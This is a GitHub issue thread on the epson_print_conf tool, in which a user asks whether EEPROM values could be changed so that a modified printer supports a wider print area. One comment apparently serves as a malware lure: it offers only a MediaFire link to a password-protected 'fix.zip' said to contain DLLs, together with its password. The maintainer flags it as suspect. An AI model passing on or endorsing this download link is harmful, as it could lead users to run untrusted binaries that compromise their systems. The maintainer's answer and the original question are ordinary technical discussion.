Ircama/epson_print_conf #25: advanced eeprom editing to change max printer size and encoder

kiyoukan, 2024-09-29:
Say I have a printer and I want to change the physical hardware of the machine to have a larger print area.
an example would be to convert the machine and give it 15mm thick 1200mm long linear rails for the print head and custom feed rollers to match.
With my current understanding, I could achieve this with an encoder change but it would then suffer massive loss in resolution and the image would have to be sent very squished to compensate. A roughly 3x to 4x loss in resolution would occur. 
But if the EEPROM could be edited to change the max travel and total encoder count, then it could theoretically be converted into a large-format printer for a fraction of the cost with no resolution penalty.
Is it possible to change any relevant eeprom  values with this tool to achieve the desired result?  
Or are those values not in eeprom but baked into the firmware.

SagarChandra07, 2024-09-29:
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
I put the necessary dlls in the archive

Ircama, 2024-09-29:
@SagarChandra07 your contribution is suspect. What does it include? We only accept open source here.

@kiyoukan This software generally allows reading and writing the EEPROM, but I have no clue about the parameters you ask

closed 2024-11-13 by github-actions[bot]